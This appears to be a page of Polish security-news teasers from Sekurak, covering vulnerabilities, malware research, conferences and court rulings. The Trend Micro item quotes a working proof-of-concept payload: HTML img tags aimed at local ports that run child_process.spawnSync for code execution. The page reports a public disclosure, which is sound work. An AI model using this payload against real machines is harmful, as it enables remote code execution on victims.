Drugi numer Sekurak/Offline to przeszło 60 stron tekstów o bezpieczeństwie aplikacji webowych. Całość w niezmienionej formie: bezpłatnie, w atrakcyjnej oprawie, treściwie i dostępne również na urządzenia mobilne.

Niedawno opublikowano wersję 1.1 projektu OWASP SAMM (Software Assurance Maturity Model), umożliwiającego zbudowanie modelu tworzenia oprogramowania tak aby: było ono bezpieczne – przy jednoczesnym optymalizowaniu kosztów całego procesu.

Tavis – rozwalacz antywirusów – Ormandy tym razem tak napisał o trzech produktach Trend Micro: Frankly, the issue is already ridiculously easy to discover and exploit though. Tym razem chodzi o wykonanie kodu na komputerze ofiary, poprzez…odwiedzenie takiego obrazka: <img src=”http://localhost:40000/json/new/?javascript:require(‘child_process’).spawnSync(‘calc.exe’) <img src=”http://localhost:40001/json/new/?javascript:require(‘child_process’).spawnSync(‘calc.exe’) <img src=”http://localhost:40002/json/new/?javascript:require(‘child_process’).spawnSync(‘calc.exe’) Podatne produkty: * Trend Micro…

Google informuje, że do tej pory około miliona kont Gmail mogło być celem tzw. government-backed attackers.  W związku z tym na blogu Google pojawiła się informacja o wprowadzeniu dużego, pełnostronicowego komunikatu ostrzegającego o fakcie ataku na Twoje konto przez siły powiązane z rządami: –ms

Arstechnica donosi o wyroku nimieckiego sądu, który potwierdza że stosowanie AdBlock Plus jest legalne. Co więcej, jest to już piąty tego typu wyrok wydany w Niemczech, a sami twórcy AdBlock Plus cytują/komentują decyzję sądu w ten sposób: (…) the court said that there is no “contract” between publishers under which users…

TL;DR – zapraszamy na konferencję CybersecPL (8 kwietnia, Warszawa) – w kuluarach będzie można wygrać koszulki sekuraka, gadgety burpa (np. mini-latarki) i ogólnie pogadać z naszą ekipą. Sam organizator – Instytut Kościuszki – pisze o wydarzeniu tak: 8 kwietnia w Warszawie odbędzie się I Polskie Forum Cyberbezpieczeństwa – coroczna konferencja…

…pod tym enigmatycznym tytułem chciałbym zaprosić wszystkich umiejących pisać ;)  do współpracy przy sekurak zinie. Do tej pory mamy wydane 2 numery (> 120 stron!) naszego bezpłatnego magazynu. Kolejny numer chcemy utrzymać w dotychczasowej konwencji (bezpłatny, ładnie wydany, dostępny na platformy mobilne). Jeśli czujesz się na siłach napisać coś sensownego…

Badacze z firmy ESET, opublikowali niedawno ciekawe opracowanie dotyczące malware o roboczej nazwie USB Thief.  Całość rospowszechnia się z wykorzystaniem odpowiednio przygotowanych pendrajwów i co interesujące, wykradzione z ofiary dane są szyfrowane na wpiętym USB (tym samym z którego rozpoczyna się infekcja). Po jego wyjęciu z komputera nie ma żadnych śladów…

Gratka dla fanów reverse engineeringu – bezpłatna ponad 900 stronicowa książka w temacie. Z opinii czytelników: It is amazing and unbelievable Thanks for the great work and your book. I love this book! I have several students reading it at the moment, plan to use it in graduate course Its…

Przewodni artykuł najnowszego wydania “Programisty” to „CQRS pragmatycznie” – poruszający problem bardzo popularny w środowiskach stosujących MVC i wzorce pochodne. Dlaczego mapowanie jedna klasa – jedna tabela jest poniekąd wypaczeniem tego, jak powinien wyglądać prawdziwy model? Tego można dowiedzieć się z artykułu Macieja Aniserowicza, który wyjaśnia, w jaki sposób zastosować…

Pokazała się zupełnie nowa klasa realnie krytycznych i wykorzystywalnych w najnowszych kościach pamięci podatności. Już jakiś czas temu badacze z googlowego Projektu Zero zaprezentowali w pełni softwareowy atak na sprzęt – a dokładniej na kości pamięci. Efekt? Uzyskanie pełnych uprawnień w OS.

Dokładna i pełna analiza podatności Stagefright – w tym pokazanie działającego exploitu (wykonanie kodu w systemie operacyjnym na Androidzie): The team here at NorthBit has built a working exploit affecting Android versions 2.2 ­ 4.0 and 5.0 ­ 5.1, while bypassing ASLR on versions 5.0 ­ 5.1 (as Android versions 2.2…

Zapraszamy na tegoroczną konferencję Semafor – to już 17 marca 2016 w Warszawie. Podczas pierwszego dnia będzie można wysłuchać naszą prezentację (hacker vs. reszta świata). Z kolei na stoisku Securitum będzie można wygrać: kilka koszulek sekuraka / gadgetów z Portswigger (twórców narzędzia burp suite)  – jeśli ktoś jeszcze nie widział latarki święcącej logo…

Całość okazała się niezmiernie prosta, wystarczyło znać adres e-mail lub nr telefonu podpięty pod konto ofiary: The only condition would have been for the attacker to know the telephone number or email address associated with the target’s account. Do resetu hasła na Facebooku wystarczy podanie 6 znakowego PINu (wysyłanego na…

Pokazano praktyczny, szybki do realizacji oraz tani atak omijający zabezpieczenie telefonu odciskiem palca. Całość to daleko idąca optymalizacja ataku polegającego na stworzeniu lateksowego opuszka. Tym razem jednak obeszło się bez budowania trójwymiarowej formy palca ofiary – wystarczy najzwyklejsza drukarka.